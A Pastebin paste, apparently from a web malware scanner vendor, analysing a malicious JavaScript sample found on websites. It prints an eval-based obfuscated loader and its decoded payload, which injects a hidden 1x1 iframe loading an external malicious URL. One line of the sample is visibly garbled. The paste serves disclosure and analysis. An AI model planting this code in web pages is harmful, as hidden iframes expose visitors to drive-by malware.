SHARE
TWEET

Quttera web malware scanner detected malicious obfuscated JS

a guest Jul 27th, 2013 62 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  * Quttera web malware scanner detected malicious obfuscated code injecting hidden iframe to malicious
  3.  * link
  4.  */
  5.  
  6. /*
  7.  * Original threat
  8.  */
  9. try {
  10.     window.document.body++
  11. } catch (gdsgsdg) {
  12.     dbshre = 147;
  13. }
  14. if (dbshre) {
  15.     asd = 0;
  16.     try {
  17.         d = document.createElement("div");
  18.         d.innerHTML.a = "asd";
  19.     } catch (agdsg) {
  20.         asd = 1;
  21.     }
  22.     if (!asd) {
  23.         e = eval;
  24.     }
  25.     ss = String;
  26.     asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 8, 1, 24, 25, 26, 27, 109, 89, 107, 26, 106, 113, 105, 107, 26, 56, 23, 92, 104, 93, 112, 100, 93, 103, 110, 41, 90, 106, 94, 91, 111, 92, 61, 101, 95, 104, 92, 102, 109, 34, 34, 96, 94, 107, 91, 104, 92, 31, 34, 53, 8, 1, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 108, 94, 23, 53, 25, 33, 99, 107, 108, 105, 52, 42, 38, 91, 94, 108, 97, 108, 107, 109, 40, 105, 99, 39, 105, 91, 107, 105, 97, 100, 91, 42, 90, 100, 98, 101, 41, 103, 96, 105, 33, 54, 4, 2, 25, 26, 27, 23, 103, 115, 107, 109, 37, 107, 109, 115, 103, 92, 38, 105, 105, 110, 96, 108, 98, 105, 105, 23, 53, 25, 33, 92, 89, 107, 104, 102, 112, 107, 93, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 90, 104, 108, 95, 92, 106, 25, 55, 27, 30, 40, 32, 53, 8, 1, 24, 25, 26, 27, 102, 114, 106, 108, 41, 106, 108, 114, 102, 96, 37, 96, 94, 99, 98, 95, 108, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 26, 27, 23, 24, 104, 116, 108, 105, 38, 108, 110, 116, 99, 93, 39, 113, 100, 91, 108, 97, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 103, 92, 94, 109, 26, 56, 23, 31, 42, 106, 115, 30, 51, 6, 4, 27, 23, 24, 25, 105, 117, 104, 106, 39, 109, 111, 112, 100, 94, 40, 111, 102, 104, 25, 55, 27, 30, 41, 105, 114, 34, 50, 5, 3, 7, 5, 23, 24, 25, 26, 100, 93, 24, 33, 27, 95, 102, 91, 110, 103, 96, 101, 108, 39, 97, 96, 107, 61, 101, 95, 104, 92, 102, 109, 60, 116, 64, 92, 33, 33, 106, 113, 105, 107, 33, 36, 32, 24, 116, 7, 5, 23, 24, 25, 26, 27, 23, 24, 25, 94, 106, 90, 109, 102, 95, 105, 107, 38, 112, 108, 100, 107, 93, 33, 33, 55, 91, 97, 111, 26, 100, 91, 53, 85, 33, 106, 113, 105, 107, 86, 34, 53, 52, 40, 94, 100, 109, 54, 32, 35, 54, 4, 2, 25, 26, 27, 23, 24, 25, 26, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 98, 92, 108, 62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 102, 114, 106, 108, 34, 32, 38, 90, 106, 107, 92, 102, 93, 61, 99, 96, 100, 93, 34, 106, 113, 105, 107, 35, 54, 4, 2, 25, 26, 27, 23, 117, 6, 4, 120, 32, 32, 34, 53);
  27.     s = "";
  28.     for (i = 0; i - 484 != 0; i++) {
  29.         if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
  30.     }
  31.     z = s;
  32.     e(s);
  33. }
  34.  
  35.  
  36. /*
  37.  * decoded payload  injecting malicious hidden iframe to http://cerfust[.]nl/paprika/clik[.]php';
  38.  */
  39. (function () {
  40.     var ozqr = document.createElement('iframe');
  41.     ozqr.src = 'http://cerfust.nl/paprika/clik.php';
  42.     ozqr.style.position = 'absolute';
  43.     ozqr.style.border = '0';
  44.     ozqr.style.height = '1px';
  45.     ozqr.style.width = '1px';
  46.     ozqr.style.left = '1px';
  47.     ozqr.style.top = '1px';
  48.     if (!document.getElementById('ozqr')) {
  49.         document.write('<div id=\'ozqr\'></div>');
  50.         document.getElementById('ozqr').appendChild(ozqr);
  51.     }
  52. })();
RAW Paste Data
Want to get better at JavaScript?
Learn to code JavaScript in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top